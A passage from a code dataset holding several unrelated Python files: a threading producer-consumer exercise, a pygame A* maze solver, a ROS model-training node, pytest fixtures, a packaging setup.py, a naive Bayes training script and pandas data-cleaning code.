= self.flowstream_check(cnt,time)\n\t\t\t\t\tif not stat:\n\t\t\t\t\t\treturn [False, \"ITRS - Invalid data.\"] \n\t\t\telif url_tag == \"flowstream_second\":\n\t\t\t\tif cells[0] in self._table_indices[url_tag][\"check\"]:\n\t\t\t\t\tcnt = cells[1] # instanceCount \n\t\t\t\t\ttime = cells[8] # startTime \n\t\t\t\t\tstat = self.flowstream_check(cnt,time)\n\t\t\t\t\tif not stat:\n\t\t\t\t\t\treturn [False, \"ITRS - Invalid data.\"] \n\t\t\telif url_tag == \"wombat\":\n\t\t\t\treturn [self.wombat_check(cells[2]), \n\t\t\t\t\"ITRS - Validated.\" if self.wombat_check(cells[2]) else \"ITRS - Invalid data.\"]\n\t\t\telif url_tag == \"rai_cache\":\n\t\t\t\tif self.subscription_check(cells[1]):\n\t\t\t\t\tprime_cnt += 1\n\t\t\telif url_tag == \"ibm_rap_links\":\n\t\t\t\tif not self.raptor_ibm_check(cells[2]):\n\t\t\t\t\treturn [False, \"ITRS - Invalid data.\"] \t\t\n\t\tif url_tag == \"rai_cache\" and prime_cnt != 2:\n\t\t\treturn [False, \"ITRS - Invalid data.\"] \n\t\treturn [True, \"ITRS - Validated.\"]\n\n\tdef _dump_log(self):\n\t\t\"\"\" Writes the status of overall run for emails module \"\"\"\n\t\tself._log.header(\"urls\",65,\"w+\")\n\t\tself._log.write(self._log_buffer, \"a\")","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":5280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"263840025","text":"import threading\nimport random\nimport logging\nimport time\n\nlogging.basicConfig(format='%(asctime)s.%(msecs)03d [%(threadName)s] - %(message)s', datefmt='%H:%M:%S', level=logging.INFO)\n\n\"\"\"\n Clase listaFinita, extiende la clase list ([]) de modo que puede establecerse un limite máximo\n al tamaño (cantidad de objetos) de la lista.\n\n Uso:\n Declaración\n lista = listaFinita(Numero_Maximo_Items)\n # Crea una lista VACIA que admitirá hasta un máximo de Numero_Maximo_Items items\n\n El acceso a los elementos es igual que en una lista standard, la diferencia es que\n si se intenta agregar un elemento cuando la lista tiene Numero_Maximo_Items items, dara\n un mensaje de error y terminara el programa.\n\n Ejemplos\n Acceso al elemento i:\n\n a = lista[i]\n\n insertar un elemento en la posicón i.\n lista.insert(i, dato) # si i es mayor que Numero_Maximo_Items termina el programa y da error\n\n o\n\n lista[i] = dato # Si i es mayor que Numero_Maximo_Items termina el programa y da error.\n\n agregar un elemento al final de la lista\n\n lista.append(dato) # Si la lista tiene Numero_Maximo_Items termina el programa y da error.\n\n\"\"\"\n\nclass listaFinita(list):\n\n def __init__(self, max_elementos):\n self.max_elementos = max_elementos\n super().__init__()\n\n def pop(self, index):\n assert len(self) != 0, \"lista vacia\"\n return super().pop(index)\n\n def append(self, item):\n assert len(self) < self.max_elementos,\"lista llena\"\n super().append(item)\n\n def insert(self, index, item):\n assert index < self.max_elementos, \"indice invalido\"\n super().insert(index, item)\n\n def full(self):\n if len(self) == self.max_elementos:\n return True\n else:\n return False\n\n\nclass Productor(threading.Thread):\n paises = [(\"España\",\"Madrid\"),(\"Francia\",\"Paris\"),(\"Italia\",\"Roma\"),(\"Inglaterra\",\"Londres\"),(\"Alemania\",\"Berlin\"),(\"Rusia\",\"Moscu\"),\n (\"Turquia\",\"Istambul\"),(\"China\",\"Pekin\"),(\"Japon\",\"Tokio\"),(\"Emiratos Arabes\",\"Dubai\"),(\"Argentina\",\"Buenos Aires\"),\n (\"Brasil\",\"Brasilia\"),(\"Colombia\",\"Bogota\"),(\"Uruguay\",\"Montevideo\")]\n\n def __init__(self, 
lista, lockLleno):\n super().__init__()\n self.lista = lista\n self.lockLleno = lockLleno\n\n #Seccion critica debido a, al igual que productor y consumidor del ejercicio anterior, productor quiere consumir un recurso que no se produjo\n def run(self):\n while True:\n self.lockLleno.acquire()\n try:\n while self.lista.full():\n pass\n self.lista.append(self.paises[random.randint(0,len(self.paises)-1)])\n logging.info(f'produjo el item: {self.lista[-1]}')\n time.sleep(random.randint(1,5))\n finally:\n self.lockLleno.release()\n\n\nclass Consumidor(threading.Thread):\n def __init__(self, lista, lockVacio):\n super().__init__()\n self.lista = lista\n self.lockVacio = lockVacio\n\n\n def run(self):\n while True:\n self.lockVacio.acquire()\n try:\n while len(self.lista) == 0:\n pass\n elemento = self.lista.pop(0)\n logging.info(f'La capital de {elemento[0]} es {elemento[1]}')\n time.sleep(random.randint(1,5))\n finally:\n self.lockVacio.release()\n\ndef main():\n hilos = []\n lista = listaFinita(4)\n #a diferencia del consumidor ejecicio primario, en este se realiza de forma polimofica, y se colocan dos Lock\n #en los runs de la clases, para que el productor pueda llenar la lista se aplica antes de que pueda cargar y despues para entregar el recurso\n #se pregunta si esta lleno desactiva el lock\n #a cambio de consumidorque libera una vez el tamaño de la lista sea = 0\n lockLleno = threading.Lock()\n lockVacio = threading.Lock()\n\n for i in range(4):\n productor = Productor(lista, lockLleno)\n consumidor = Consumidor(lista, lockVacio)\n hilos.append(productor)\n hilos.append(consumidor)\n #con logging info, se busca los valores del thread que se pasa como paramentro en la Clase\n logging.info(f'Arrancando productor {productor.name}')\n productor.start()\n\n logging.info(f'Arrancando productor {consumidor.name}')\n consumidor.start()\n #los treads se agregan a una lista, despues iteramos la lista de threads para poder ejec join para que corran juntos\n for h in hilos:\n h.join()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Productor_Consumidor_1-Ejercicio2-Resuelto.py","file_name":"Productor_Consumidor_1-Ejercicio2-Resuelto.py","file_ext":"py","file_size_in_byte":4635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"130187454","text":"from pygame.locals import *\nimport pygame\nimport sys\n\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nORANGE = (233, 163, 38)\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nWINDOW_HEIGHT = 800\nWINDOW_WIDTH = 800\n\n\ndef drawGrid(maze):\n blockSize = 80\n for x in range(0, 800, blockSize):\n for y in range(0, 800, blockSize):\n rect = pygame.Rect(x, y, blockSize, blockSize)\n if maze[y//80][x//80] == 1:\n SCREEN.fill(RED, rect)\n elif maze[y//80][x//80] == 2:\n SCREEN.fill(ORANGE, rect)\n else:\n pygame.draw.rect(SCREEN, BLACK, rect, 1)\n\n\ndef drawAnswerGrid(maze, path):\n blockSize = 80\n for x in range(0, 800, blockSize):\n for y in range(0, 800, blockSize):\n rect = pygame.Rect(x, y, blockSize, blockSize)\n if maze[y//80][x//80] == 1:\n SCREEN.fill(RED, rect)\n else:\n pygame.draw.rect(SCREEN, BLACK, rect, 1)\n for t in path:\n rect = pygame.Rect(t[1] * 80, t[0] * 80, blockSize, blockSize)\n SCREEN.fill(GREEN, rect)\n\n\n# Calculate the shortest path\n\n\nclass Node():\n \"\"\"A node class for A* Pathfinding\"\"\"\n\n def __init__(self, parent=None, position=None):\n self.parent = parent\n self.position = position\n\n self.g = 0\n self.h = 0\n self.f = 0\n\n def __eq__(self, other):\n return 
self.position == other.position\n\n\ndef astar(maze, start, end):\n start_node = Node(None, start)\n start_node.g = start_node.h = start_node.f = 0\n end_node = Node(None, end)\n end_node.g = end_node.h = end_node.f = 0\n\n # Initialize both open and closed list\n open_list = []\n closed_list = []\n\n # Add the start node\n open_list.append(start_node)\n\n while len(open_list) > 0:\n\n # Get the current node\n current_node = open_list[0]\n current_index = 0\n for index, item in enumerate(open_list):\n if item.f < current_node.f:\n current_node = item\n current_index = index\n\n # Pop current off open list, add to closed list\n open_list.pop(current_index)\n closed_list.append(current_node)\n\n # Found the goal\n if current_node == end_node:\n path = []\n current = current_node\n while current is not None:\n path.append(current.position)\n current = current.parent\n return path[::-1] # Return reversed path\n\n # Generate children\n children = []\n # Adjacent squares\n for new_position in [(0, -1), (0, 1), (-1, 0), (1, 0), (-1, -1), (-1, 1), (1, -1), (1, 1)]:\n\n # Get node position\n node_position = (\n current_node.position[0] + new_position[0], current_node.position[1] + new_position[1])\n\n # Make sure within range\n if node_position[0] > (len(maze) - 1) or node_position[0] < 0 or node_position[1] > (len(maze[len(maze)-1]) - 1) or node_position[1] < 0:\n continue\n\n # Make sure walkable terrain\n if maze[node_position[0]][node_position[1]] != 0:\n continue\n\n # Create new node\n new_node = Node(current_node, node_position)\n\n # Append\n children.append(new_node)\n\n # Loop through children\n for child in children:\n\n # Child is on the closed list\n for closed_child in closed_list:\n if child == closed_child:\n continue\n\n # Create the f, g, and h values\n child.g = current_node.g + 1\n child.h = ((child.position[0] - end_node.position[0]) **\n 2) + ((child.position[1] - end_node.position[1]) ** 2)\n child.f = child.g + child.h\n\n # Child is already in the open list\n for open_node in open_list:\n if child == open_node and child.g > open_node.g:\n continue\n\n # Add the child to the open list\n open_list.append(child)\n\n\nif __name__ == \"__main__\":\n maze = [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]]\n pygame.init()\n SCREEN = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\n s_e_position = []\n while True:\n SCREEN.fill(WHITE)\n drawGrid(maze)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n elif event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == 3:\n x, y = pygame.mouse.get_pos()\n for t in range(0, 800, 80):\n for u in range(0, 800, 80):\n if x > t and x <= t+80 and y > u and y <= u+80:\n maze[u//80][t//80] = 1\n\n if event.button == 1:\n x, y = pygame.mouse.get_pos()\n for t in range(0, 800, 80):\n for u in range(0, 800, 80):\n if x > t and x <= t+80 and y > u and y <= u+80:\n maze[u//80][t//80] = 2\n s_e_position.append([u//80, t//80])\n\n if len(s_e_position) == 2:\n start = tuple(s_e_position[0])\n end = tuple(s_e_position[1])\n\n maze[start[0]][start[1]] = 0\n maze[end[0]][end[1]] = 0\n path = astar(maze, start, end)\n drawAnswerGrid(maze, path)\n\n pygame.display.update()\n\"\"\"\n for i in range(10):\n for j in 
range(10):\n if maze[i][j] == 2:\n if count == 1:\n start = (i, j)\n print(1)\n if count == 2:\n end = (i, j)\n maze[start[0]][start[1]] = 0\n maze[end[0]][end[1]] = 0\n print(maze)\n path = astar(maze, start, end)\n drawAnswerGrid(maze, path)\n print(path)\n break\n\"\"\"\n","sub_path":"scripts/maze.py","file_name":"maze.py","file_ext":"py","file_size_in_byte":6536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"275008350","text":"#!/usr/bin/env python\n\nimport os\nimport rospy\nimport yaml\nfrom omron_cad_matching.util import *\nfrom omron_cad_matching.train_client import *\n\nclass TrainMultiNode(TrainClient):\n def __init__(self):\n super(TrainMultiNode, self).__init__()\n\n # file settings\n cad_dir = rospy.get_param(\"~cad_dir\")\n conf_dir = rospy.get_param(\"~conf_dir\")\n parts_list = rospy.get_param(\"~parts_list\")\n setting_filename = rospy.get_param(\"~camera_setting_filename\")\n model_dir = rospy.get_param(\"~model_dir\")\n model_name = rospy.get_param(\"~model_name\")\n\n # object search param\n min_dist = rospy.get_param(\"~train_setting/min_dist\")\n max_dist = rospy.get_param(\"~train_setting/max_dist\")\n thread_num = rospy.get_param(\"~train_setting/thread_num\")\n\n # create client of omron cad matching training service server\n self.init_model()\n\n # camera setting\n camera_setting = read_camera_setting_yaml(setting_filename)\n\n # for each parts\n id_map = dict()\n object_id = 0\n for parts in parts_list:\n # read object config\n conf_filename = os.path.join(conf_dir, parts + \".yaml\")\n rospy.loginfo(\"read object config. file = %s\", conf_filename)\n obj_conf = read_object_config_yaml(conf_filename)\n search_setting = get_search_setting(obj_conf, min_dist, max_dist, thread_num)\n\n # train\n cad_filename = os.path.join(cad_dir, parts + \".stl\")\n rospy.loginfo(\"train. cad file = %s\", cad_filename)\n res = self.train_model(cad_filename, camera_setting, search_setting)\n if res.model_id >= 0:\n id_map[obj_conf.object_id] = res.model_id\n\n # save trained model that include template of all parts into a file\n data_filename = os.path.join(model_dir, model_name + \".dat\")\n text_filename = os.path.join(model_dir, model_name + \"_train.txt\")\n rospy.loginfo(\"save model. 
file = %s\", data_filename)\n self.save_model(data_filename, text_filename)\n\n # save map from object_id to model_id to yaml file \n id_filename = os.path.join(model_dir, model_name + \".yaml\")\n data = dict(id_map = id_map)\n with open(id_filename, 'w') as outfile:\n yaml.dump(data, outfile, default_flow_style=False)\n rospy.loginfo(\"id_map from object_id to model_id = \" + str(id_map))\n\nif __name__ == \"__main__\":\n rospy.init_node('train_multi', anonymous=True, log_level=rospy.INFO)\n node = TrainMultiNode()\n","sub_path":"catkin_ws/src/omron_cad_matching/scripts/train_multi.py","file_name":"train_multi.py","file_ext":"py","file_size_in_byte":2664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"217920505","text":"#!/bin/env python3\n# -*- coding: utf-8 -*-\n# TOMUSS: The Online Multi User Simple Spreadsheet\n# Copyright (C) 2008-2011 Thierry EXCOFFIER, Universite Claude Bernard\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n#\n# Contact: Thierry.EXCOFFIER@bat710.univ-lyon1.fr\n\nfrom ..column import ColumnAttr\nfrom .. import configuration\nimport time\n\nclass ColumnVisibilityDate(ColumnAttr):\n name = 'visibility_date'\n update_table_headers = 1\n def check(self, date):\n if date == '':\n return\n mktime = time.mktime(time.strptime(date, '%Y%m%d'))\n if mktime > time.time() + 86400*configuration.max_visibility_date:\n return '''_(\"ALERT_date_in_future_1\")+\"%d\"+\n_(\"ALERT_date_in_future_2\")\n''' % int((time.mktime(time.strptime(date, '%Y%m%d')) - time.time())/86400)\n if mktime < time.time() - 86400:\n return '_(\"ALERT_date_in_past\")'\n formatter = '''\nfunction(column, value)\n{\n if ( value === '' ) return '' ;\n return column.visibility_date.substr(6,2) + '/' +\n\t column.visibility_date.substr(4,2) + '/' +\n\t column.visibility_date.substr(0,4) ;\n}'''\n check_and_set = 'set_visibility_date'\n css = \"\"\"\n#t_column_visibility_date.empty {\n background-image: url('visible.png');\n}\n\n#menutop DIV.tabs #t_column_visibility_date { width: 73% }\n\n\"\"\"\n","sub_path":"ATTRIBUTES/columnvisibilitydate.py","file_name":"columnvisibilitydate.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"345183837","text":"#!/usr/bin/env python3\n\n\"\"\" \nCreated on:\t July, 2020\n@uthor: \t adejonghm\n----------\n\nScript to Manage the JSON file.\n\"\"\"\n\nimport os\nimport json\nimport argparse\nimport libs.jilib as jm\n\n\nif __name__ == \"__main__\":\n\n ap = argparse.ArgumentParser()\n ap.add_argument(\"-f\", \"--file\", required=True, help=\"path to the input JSON file\")\n args = vars(ap.parse_args())\n\n if args['file'].endswith('.json') and os.path.exists(args['file']):\n input_path = args['file']\n else:\n print('ERROR! 
JSON file not found.')\n os.sys.exit(1)\n\n #### READ JSON FILE ####\n with open(input_path, encoding='utf-8') as file:\n inFile = json.load(file)\n\n outFile = jm.add_item_in_node(inFile, 1, \"backgrdImage\", \"background.jpg\")\n\n #### WRITE NEW JSON FILE ####\n with open('metadata.json', 'w', encoding='utf-8') as file:\n json.dump(outFile, file, indent=2)\n\n print('DONE!')\n","sub_path":"SignalProcessing/json_manager.py","file_name":"json_manager.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"314178648","text":"from wtforms.validators import ValidationError\n\nfrom app import db_session\n\nclass Unique(object):\n def __init__(self, model, field, message=None):\n self.model = model\n self.field = field\n if not message:\n message = u'%s exists already' % (field)\n self.message = message\n\n def __call__(self, form, field):\n check = db_session.query(self.model).filter(self.field == field.data).first()\n if 'id' in form:\n id = form.id.data\n else:\n id = None\n if check and (id is None or id != check.id):\n raise ValidationError(self.message)\n","sub_path":"app/common/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"584312800","text":"\"\"\"\n Definition of xNVMe Python Distribution Package\n\"\"\"\nimport codecs\nimport glob\nimport os\nfrom setuptools import setup\n\ndef read(*parts):\n \"\"\"Read parts to use a e.g. long_description\"\"\"\n\n here = os.path.abspath(os.path.dirname(__file__))\n\n # intentionally *not* adding an encoding option to open, See:\n # https://github.com/pypa/virtualenv/issues/201#issuecomment-3145690\n with codecs.open(os.path.join(here, *parts), 'r') as pfp:\n return pfp.read()\n\nsetup(\n name=\"pyxnvme\",\n version=\"0.0.12\",\n description=\"xNVMe: cross-platform libraries and tools for NVMe devices\",\n long_description=read('README.rst'),\n author=\"Simon A. F. 
Lund\",\n author_email=\"simon.lund@samsung.com\",\n# url=\"https://github.com/xnvme/xnvme\",\n license=\"Apache License 2.0\",\n install_requires=[],\n zip_safe=False,\n packages=[\"xnvme\"],\n# package_dir={\"\": \"modules\"},\n data_files=[\n (\"bin\", glob.glob(\"bin/*\")),\n ],\n options={'bdist_wheel':{'universal':True}},\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Environment :: Console\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: System Administrators\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Programming Language :: Python\",\n \"Topic :: Utilities\",\n \"Topic :: Software Development\",\n \"Topic :: Software Development :: Testing\"\n ],\n)\n","sub_path":"pyxnvme/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"220381703","text":"\"\"\"\nPytest unit test configuration for oodi\n\"\"\"\nfrom pathlib import Path\nfrom shutil import copyfile, copytree, rmtree\nfrom typing import Iterator\n\nimport pytest\n\nfrom oodi.client import Oodi\nfrom oodi.codecs.constants import CodecFormat\nfrom oodi.configuration import Configuration\nfrom oodi.library.album import Album\nfrom oodi.library.tree import Library\nfrom oodi.metadata.constants import ALBUMART_SUPPORTED_FILENAMES, BOOKLET_SUPPORTED_FILENAMES\n\nMOCK_MESSAGE = 'Mock message'\n\nMOCK_DATA = Path(__file__).parent.joinpath('mock')\nMOCK_METADATA = MOCK_DATA.joinpath('metadata')\nMOCK_CONFIG_DIRECTORY = MOCK_DATA.joinpath('config/default')\nMOCK_EMPTY_CONFIG_DIRECTORY = MOCK_DATA.joinpath('config/empty')\n\n# Directory with whitenoise samples\nMOCK_WHITENOISE_SAMPLES_PATH = MOCK_DATA.joinpath('samples')\nMOCK_WHITENOISE_SAMPLES_FOLDER_COUNT = 3\nMOCK_METADATA_FILES_COUNT = 8\nMOCK_WHITENOISE_SAMPLES_COUNT = 9\n\n# Mocked album paths that do not exist\nTEST_ALBUM_PATHS = (\n Path('Album/In Library'),\n)\n\n# List of all sample files as standard Path objects from the test data directory\nWHITENOISE_SAMPLE_FILES = [\n item\n for item in list(MOCK_WHITENOISE_SAMPLES_PATH.glob('**/*'))\n if item.is_file()\n]\n\nMOCK_METADATA_FILES = [path for path in MOCK_METADATA.glob('**/*') if path.is_file()]\nMOCK_ALBUMART_FILES = [\n path\n for path in MOCK_METADATA_FILES\n if path.name in ALBUMART_SUPPORTED_FILENAMES\n]\nMOCK_BOOKLET_FILES = [\n path\n for path in MOCK_METADATA_FILES\n if path.name in BOOKLET_SUPPORTED_FILENAMES\n]\n\n\n@pytest.fixture\ndef mock_missing_config_file(monkeypatch, tmpdir) -> Iterator[Path]:\n \"\"\"\n Return a non-existing temporary directory for constant\n oodi.constants.USER_CONFIG_DIRECTORY\n \"\"\"\n missing_config_path = Path(tmpdir.strpath, 'missing-userconfig')\n monkeypatch.setattr(\n 'oodi.constants.USER_CONFIG_DIRECTORY',\n missing_config_path\n )\n yield missing_config_path\n if missing_config_path and missing_config_path.is_dir():\n rmtree(missing_config_path)\n\n\n@pytest.fixture\ndef mock_empty_config_file(monkeypatch) -> Iterator[Path]:\n \"\"\"\n Mock constant oodi.constants.USER_CONFIG_DIRECTORY to return\n mocked directory tests/mock/config/empty with valid but empty\n configuration file\n \"\"\"\n monkeypatch.setattr(\n 'oodi.constants.USER_CONFIG_DIRECTORY',\n MOCK_EMPTY_CONFIG_DIRECTORY,\n )\n yield MOCK_EMPTY_CONFIG_DIRECTORY\n\n\n@pytest.fixture\ndef mock_default_config_file(monkeypatch) -> Iterator[Path]:\n \"\"\"\n Mock constant oodi.constants.USER_CONFIG_DIRECTORY to return\n mocked directory 
tests/mock/config/default\n \"\"\"\n monkeypatch.setattr(\n 'oodi.constants.USER_CONFIG_DIRECTORY',\n MOCK_CONFIG_DIRECTORY,\n )\n yield MOCK_CONFIG_DIRECTORY\n\n\n@pytest.fixture\ndef missing_tmpdir_directory(tmpdir) -> Iterator[Path]:\n \"\"\"\n Yield missing temporary directory path for unit tests\n \"\"\"\n missing_directory = Path(tmpdir.strpath, 'missing-directory')\n yield missing_directory\n if missing_directory and missing_directory.is_dir():\n rmtree(missing_directory)\n\n\n# pylint: disable=redefined-outer-name,unused-argument\n@pytest.fixture\ndef mock_empty_config(mock_empty_config_file) -> Iterator[Configuration]:\n \"\"\"\n Mock returning Configuration object with mock_empty_config_file fixture\n \"\"\"\n yield Configuration()\n\n\n@pytest.fixture(params=WHITENOISE_SAMPLE_FILES)\ndef mock_sample_file(request) -> Iterator[Path]:\n \"\"\"\n Mock request with full paths to the sample files in test data\n \"\"\"\n yield request.param\n\n\n@pytest.fixture(params=MOCK_METADATA_FILES)\ndef mock_metadata_file(request):\n \"\"\"\n Mock fixture to list all available metadata files in test data\n \"\"\"\n yield request.param\n\n\n@pytest.fixture(params=MOCK_ALBUMART_FILES)\ndef mock_albumart_file(request):\n \"\"\"\n Mock fixture to list all available album art files in test data\n \"\"\"\n yield request.param\n\n\n@pytest.fixture(params=MOCK_BOOKLET_FILES)\ndef mock_booklet_file(request):\n \"\"\"\n Mock fixture to list all available booklet files in test data\n \"\"\"\n yield request.param\n\n\n@pytest.fixture\ndef mock_empty_library(mock_empty_config, tmpdir) -> Iterator[Library]:\n \"\"\"\n Mock returning Library object for tmpdir directory\n \"\"\"\n yield Library(config=mock_empty_config, path=Path(tmpdir.strpath))\n\n\n@pytest.fixture\ndef mock_sample_library(mock_empty_config, tmpdir) -> Iterator[Library]:\n \"\"\"\n Generate a Library object for samples with albumart and bookmark files\n from mock data directory\n \"\"\"\n albumart = MOCK_ALBUMART_FILES[0]\n booklet = MOCK_BOOKLET_FILES[0]\n path = Path(tmpdir.strpath, 'music')\n\n copytree(MOCK_WHITENOISE_SAMPLES_PATH, path)\n copyfile(albumart, path.joinpath(albumart.name))\n copyfile(booklet, path.joinpath(booklet.name))\n for item in path.glob('**/*'):\n if item.is_dir():\n copyfile(albumart, item.joinpath(albumart.name))\n copyfile(booklet, item.joinpath(booklet.name))\n\n yield Library(\n config=mock_empty_config,\n path=path,\n formats=[codec_format.value for codec_format in CodecFormat]\n )\n\n\n@pytest.fixture\ndef oodi_empty_client(mock_empty_config_file) -> Iterator[Oodi]:\n \"\"\"\n Yield Oodi client with mocked empty config\n \"\"\"\n yield Oodi()\n\n\n@pytest.fixture\ndef oodi_default_client(mock_default_config_file) -> Iterator[Oodi]:\n \"\"\"\n Yield Oodi client with mocked default config\n \"\"\"\n yield Oodi()\n\n\n@pytest.fixture(params=TEST_ALBUM_PATHS)\ndef mock_album_relative_path(request) -> Iterator[Path]:\n \"\"\"\n Return iterator for valid album relative paths\n \"\"\"\n yield request.param\n\n\n# pylint: disable=redefined-outer-name\n@pytest.fixture\ndef mock_album(mock_empty_library, mock_album_relative_path) -> Iterator[Album]:\n \"\"\"\n Return mocked Album object\n \"\"\"\n yield Album(mock_empty_library, mock_empty_library.joinpath(mock_album_relative_path))\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":5991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"55817528","text":"import numpy as 
np\nimport cv2\nimport matplotlib.pyplot as plt\nfrom skimage.segmentation import *\nimport prepData\nfrom classicMethods import nonNNAlgo\nfrom sklearn.decomposition import PCA\nimport pickle\nfrom timeit import default_timer as timer\nimport glob\n#import extract_data\n\nwidth = 520\nheight = 475\nnum_pixel = (width-7)*(height-7)\n\n# extract train and test data directly\n# train_x, train_y, _, _, _, _, _, test_x, test_y, _, _, _ = extract_data.exData(save_idx = False)\n\n# read all data\ntrain_x = []\ntrain_y = []\ntest_x = []\ntest_y = []\nfor k in range (0,4):# read every video\n \n # train data\n for filename in glob.glob('train_data_surgery'+str(k)+'_*.pkl'):\n with open(filename, 'rb') as f:\n train_x_temp, train_y_temp = pickle.load( f )\n# train_x_temp, train_y_temp, _, _, _ = pickle.load( f ) # for _short\n train_x.append(train_x_temp)\n train_y.append(train_y_temp) \n print(train_x_temp.shape,train_y_temp.shape)\n \n # test data\n with open('test_data_surgery'+str(k)+'.pkl', 'rb') as f:\n test_x_temp, test_y_temp, _, _,_ = pickle.load( f )\n test_x.append(test_x_temp)\n test_y.append(test_y_temp)\n \n print('test', test_x_temp.shape, test_x_temp.shape)\n \ntrain_x = np.concatenate(train_x, axis=0) \ntrain_y = np.concatenate(train_y, axis=0)\ntest_x = np.concatenate(test_x, axis=0) \ntest_y = np.concatenate(test_y, axis=0)\n \n# print(train_x.shape,train_y.shape, test_x.shape, test_y.shape)\n \n## pca: only works for _short data\n#pca = PCA(n_components=5)\n#train_x = pca.fit_transform(train_x)\n \nnon_NN_Algo = nonNNAlgo(None, None, None, None, None, None)\nnon_NN_Algo.train_X = train_x\nnon_NN_Algo.train_Y = train_y.ravel()\n\n# train Bayes\nprint('start training Bayes...')\nstart = timer()\n_ = non_NN_Algo.naiveBayesianSeg(train_idx = True, test_idx = False)\nprint('[bayes]', timer() - start)\n\n## test\n#non_NN_Algo.test_X = pca.transform(test_x)\nnon_NN_Algo.test_X = test_x\nnon_NN_Algo.test_Y = test_y.ravel()\ntest_results = non_NN_Algo.naiveBayesianSeg(train_idx = False, test_idx = True, pMetrics=True)\nprint('test bayes: 1)iou:',test_results[1],'2)dice:',test_results[2],'3)time:',test_results[3])","sub_path":"classic_methods/trainbayes.py","file_name":"trainbayes.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"289359633","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 22 19:42:43 2020\n\n@author: franc\n\"\"\"\n\n\nimport pandas as pd\nimport math\nimport numpy as np\n\npath_guardado = \"./data/artwork_data.pickle\"\n\ndf = pd.read_pickle(path_guardado)\n\nseccion_df = df.iloc[49980:50019,:].copy()\n\ndf_agrupar_artista = seccion_df.groupby(\"artist\")\n\nprint(type(df_agrupar_artista))\n\nfor columna, df_agrupado in df_agrupar_artista:\n print(\"Columna\", type(columna))\n print(columna)\n print(\"Df_agrupado\", type(df_agrupado))\n print(df_agrupado)\n \n# hacer calciulos en columnas del df\n\na = seccion_df[\"units\"].value_counts() # 38 (mm) #1 nan\n\n\n#Verificar si la columan esta vacia\nprint(seccion_df[\"units\"].empty)\nprint(a.empty)\n\ndef llenar_valores_vacios(series, tipo):\n lista_valores = series.value_counts()\n if lista_valores.empty == True:\n return series\n else:\n if tipo == \"promedio\":\n suma = 0\n numero_valores = 0\n for valor_serie in series:\n if (isinstance(valor_serie, str)):\n valor = int(valor_serie)\n numero_valores += 1\n suma += valor\n else: \n pass\n promedio = suma/ numero_valores\n series_valores_llenos = 
series.fillna(promedio)\n return series_valores_llenos\n elif tipo == \"mas_repetido\":\n cuentas_series = series.value_counts() \n mas_repetido = series.value_counts().index[0]\n return series.fillna(mas_repetido)\n \n\ndef transformar_df(df):\n df_artist = df.groupby(\"artist\")\n lista_df= []\n for artista, df in df_artist:\n copia_df = df.copy()\n serie_w = copia_df[\"width\"]\n serie_h = copia_df[\"height\"]\n serie_u = copia_df[\"units\"]\n serie_i = copia_df[\"title\"]\n print(\"Serie i\", serie_i)\n copia_df.loc[:, \"width\"] = llenar_valores_vacios(serie_w, \"promedio\")\n copia_df.loc[:, \"height\"] = llenar_valores_vacios(serie_h, \"promedio\")\n copia_df.loc[:, \"units\"] = llenar_valores_vacios(serie_u, \"mas_repetido\")\n copia_df.loc[:, \"title\"] = llenar_valores_vacios(serie_i, \"mas_repetido\")\n lista_df.append(copia_df)\n df_completo = pd.concat(lista_df)\n return df_completo\n \ndf_lleno = transformar_df(seccion_df)\n","sub_path":"03 - 